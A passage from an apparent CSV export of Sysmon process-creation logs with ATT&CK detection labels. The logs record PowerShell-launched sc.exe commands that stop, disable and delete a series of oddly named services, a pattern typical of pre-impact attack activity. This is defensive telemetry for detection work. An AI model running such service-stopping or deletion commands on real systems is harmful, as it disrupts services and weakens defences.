Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete Nationalmll +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete Nationalmll",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.222830200Z"",""eventRecordID"":""2070"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.220\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-001067441900}\r\nProcessId: 5940\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete Nationalmll\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.220"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-001067441900}"",""processId"":""5940"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete Nationalmll"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.448",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.204 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-001096431900} +ProcessId: 4188 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationalmll +CurrentDirectory: 
C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationalmll",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.207389700Z"",""eventRecordID"":""2069"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.204\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-001096431900}\r\nProcessId: 4188\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationalmll\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.204"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-001096431900}"",""processId"":""4188"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationalmll"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.383",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.156 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-00100c411900} +ProcessId: 1104 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationaloll +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationaloll",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.158411100Z"",""eventRecordID"":""2066"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.156\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-00100c411900}\r\nProcessId: 1104\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationaloll\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: 
DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.156"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-00100c411900}"",""processId"":""1104"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationaloll"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.337",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 
2020-05-28 12:49:34.114 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010813e1900} +ProcessId: 1700 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Natimmonal +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Natimmonal",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.117004600Z"",""eventRecordID"":""2063"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.114\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010813e1900}\r\nProcessId: 1700\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: 
sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Natimmonal\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.114"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-0010813e1900}"",""processId"":""1700"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Natimmonal"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s 
-NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.322",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.104 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010b13d1900} +ProcessId: 6932 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Natimmonal Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Natimmonal Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.106165200Z"",""eventRecordID"":""2062"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.104\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010b13d1900}\r\nProcessId: 6932\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 
10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Natimmonal Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.104"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-0010b13d1900}"",""processId"":""6932"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Natimmonal Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.275",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.084 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010233c1900} +ProcessId: 4468 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationaaal +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 
Nationaaal",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.085893500Z"",""eventRecordID"":""2060"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.084\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010233c1900}\r\nProcessId: 4468\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationaaal\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.084"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-0010233c1900}"",""processId"":""4468"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationaaal"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:02.228",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.052 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010c9391900} +ProcessId: 4052 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop National +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 
